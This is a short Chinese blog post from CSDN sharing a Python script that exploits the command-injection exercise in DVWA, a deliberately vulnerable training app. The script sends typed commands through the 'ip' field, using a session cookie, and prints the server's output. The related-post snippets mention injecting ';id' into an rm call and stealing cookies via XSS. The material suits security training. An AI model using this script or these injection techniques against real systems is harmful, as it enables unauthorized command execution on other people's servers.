DVWA命令执行简单脚本

最新推荐文章于 2023-02-13 13:49:10 发布
最新推荐文章于 2023-02-13 13:49:10 发布
阅读量283 收藏
点赞数 1
分类专栏: python爬虫 文章标签: python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45742511/article/details/113780125
版权 
import requests
from bs4 import BeautifulSoup

url = 'http://ip地址/dvwa/vulnerabilities/exec/'
def command_inject(command):
    Cookies = dict(security='low', PHPSESSID=' xxxxxxxx  ')

    payload = {
        "ip": command,
        "Submit": "Submit"
    }

    reponse = requests.post(url=url,cookies=Cookies,data=payload).text
    #实例化对象
    soup = BeautifulSoup(reponse,'lxml')
	#定位标签
    content_tag = soup.find_all(name='pre')
	#打印命令执行结果
    for content in content_tag:
        print(content.string)

while 1:

    cmd = input('quit->>退出\n输入执行命令:')
    if len(cmd) == 0:
        continue
    if cmd =='quit':
        break
    command_inject(cmd)
「已注销」
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
DVWA系列(八)——使用Burpsuite进行File Inclusion(文件包含)
橘子女侠
05-07 1884
1. 文件包含(File Inclusion)漏洞简介 (1)文件包含 开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含; (2)文件包含漏洞 开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞;在PHP中经常出现文件包含漏洞; (3)p...
DVWA系列——命令执行(Command Injection)
weixin_49340699的博客
11-18 376
NVWA系列 ——命令执行(Command Injection) 命令执行: 即命令注入,通过提交恶意构造的参数破坏命令语句结构,达到执行恶意命令的目的 比如删除文件就可以用一个url请求 http://127.0.0.1/delete.php?filename=bob.txt;id delete.php 的内容 <?php $file=$_GET['filename'] system("rm $file"); ?> (基于linux系统)这样就能达到恶意删除bob.txt文件的目的同时用了
dvwa为例学习简单sql布尔盲注的详细脚本
Lethe's Blog
03-02 2516
0x01 前置知识 1.SQL注入与SQL盲注 SQL注入: 执行SQL注入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等 一般在页面上直接就会显示执行sql语句的结果 SQL盲注: 一般情况,执行SQL盲注,服务器不会直接返回具体的数据库错误or语法错误,而是会返回程序开发所设置的特定信息(也有特例,如基于报错的盲注) 一般在页面上不会直接显示sql执行的结果 ...
DVWA安装以及模块使用教程(一)
Estrus5的博客
04-30 1万+
一、DVWA介绍 DVWA(Damn Vulnerable Web Application)是randomstorm的一个开源项目。一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 DVWA共有十个模块,分别是: 1.Brute Force(密码破解) 2.Command Injection(命令行注入) 3.CSRF(跨站请求伪造) 4.File Inclusion(文件包含) 5.F
dvwa-XSS(存储跨站脚本)
qq_74806534的博客
02-13 337
存储型的不同之处在于它可以将用户构造的有害输入直接存储起来,不需要攻击者构造链接诱使受害人点击触发,而是目标网站的用户只要访问插入恶意代码的网站就能触发,相比较反射型xss更为隐蔽,危害更大,受害者也会更多。
dvwa中的xss(跨站脚本)攻击
无痕的博客
01-17 1829
xss攻击介绍与在dvwa中的xss攻击演示
dvwa爆破脚本pytho3版
09-04
核心在于获取token,python3中通过requests、re模块获取token,在结合生成的字典进行爆破,代码简单展示了获取token的主要过程
DVWA学习之XSS(跨站脚本攻击)(超级详细)
weixin_40950781的博客
08-22 1万+
DVWA学习之XSSXSS 跨站脚本攻击0x01 XSS(Cross Site Script)简介0x02 何为XSS0x03 XSS存在的原因0x04 XSS漏洞的危害0x05 XSS 的分类及特点1. 存储型XSS2. 反射型XSS3. MOD型XSS XSS 跨站脚本攻击 0x01 XSS(Cross Site Script)简介 0x02 何为XSS 跨站脚本攻击XSS(Cross Sit...
自动化在centos7上搭建DVWA靶场,shell脚本
11-22
自动化在centos7上搭建DVWA靶场,注意文件不要在windows下编辑 自动化在centos7上搭建DVWA靶场,注意文件不要在windows下编辑 自动化在centos7上搭建DVWA靶场,注意文件不要在windows下编辑
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
LNMP一键自动化编译安装脚本 附带DVWA
01-04
更新源---安装所需环境---创建存放路径---安装并配置Nginx---安装并配置Alisql---安装并配置php---安装并配置DVWA~
DVWA通关手册.docx
08-19
文档内部包含DVWA平台,所有类型漏洞低中高等级的攻击过程,非常仔细。也有部分自己的攻击方法,值得一试。
DVWA命令执行(Command Injection)
qq_43452198的博客
04-23 282
Command Injectionlowmediumhighimpossible 命令注入攻击的常见模式为:仅仅需要输入数据的场合,却伴随着数据同时输入了恶意代码,而装载数据的系统对此并未设计良好的过滤过程,导致恶意代码也一并执行,最终导致信息泄露或者正常数据的破坏。 low <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get inp...
渗透测试技术----常见web漏洞--命令执行原理及防御
wwl012345的博客
08-15 2436
一、命令执行漏洞介绍 1.命令执行漏洞简介 命令执行漏洞时指服务器没有对执行命令进行过滤,用户可以随意执行系统命令命令执行漏洞属于高危漏洞之一,也属于代码执行的范围内。 2.命令执行漏洞的原理 应用程序有时需要调用一些执行系统命令的函数,如在PHP中,使用System()、exec()、shell_exec()、passthru()、popen()、proc_popen()等函数可以执行...
053 OS命令注入与DVWA靶场搭建及命令注入
鸡蛋炒鸡蛋
03-11 2796
文章目录
XSS跨站脚本攻击入门实例--DVWA
chengfangang的专栏
03-03 7167
一、窃取Cookie       对于跨站的攻击方法,使用最多的莫过于cookie窃取了,获取cookie后直接借助“Live http headers、Tamper Data、Gressmonkey (Cookie injector)、Fiddler”等等工具将cookie修改为获取的cookie,这样即可获得权限。成功还有必要因素(同源策略+浏览器+form标签表单) 首先,我们在DVWA
DVWA系列(四)----Command Injection (命令行注入)
热门推荐
fendo
02-10 2万+
一、攻击模块2:Command Injection(命令注入)       命令注入攻击的常见模式为:仅仅需要输入数据的场合,却伴随着数据同时输入了恶意代码,而装载数据的系统对此并未设计良好的过滤过程,导致恶意代码也一并执行,最终导致信息泄露或者正常数据的破坏。        PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一,国内著名的Web应用程序Discuz!、DedeC
DVWA学习之Command Injection命令行注入(python脚本实现)
qq_31426383的博客
12-01 284
DVWA学习之Command Injection命令行注入概述 概述 搭建方法请转至 DVMA学习之安装、环境搭建等。 Brute Force请转至 DVWA学习之Brute Force暴力破解(python脚本实现) 本部分先张贴别人的博客(仅讲解,无脚本实现),后续再贴自己写的 python 脚本。 https://www.cnblogs.com/jojo-feed/p/10172770.html ...
DVWA命令注入
极光时流
04-07 1209
DVWA命令注入 Low 查看源码: ip参数没有做任何的过滤就直接放在shell_exec函数中执行了,执行语句为shell_exec( 'ping 127.0.0.1 && whami ')。(linux下使用whoami查看用户命令,windows使用net user) low级别的代码接收了用户输入的ip,然后根据服务器是否是Windows NT系统,对目标ip进行...
DVWA系统命令执行漏洞利用
最新发布
10-20
DVWA系统命令执行漏洞是指攻击者通过DVWA系统中的漏洞,成功执行系统命令,从DVWA系统命令执行漏洞是指攻击者通过DVWA系统中的漏洞,成功执行系统命令,从而获取系统权限或者窃取敏感信息。攻击者可以通过输入恶意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值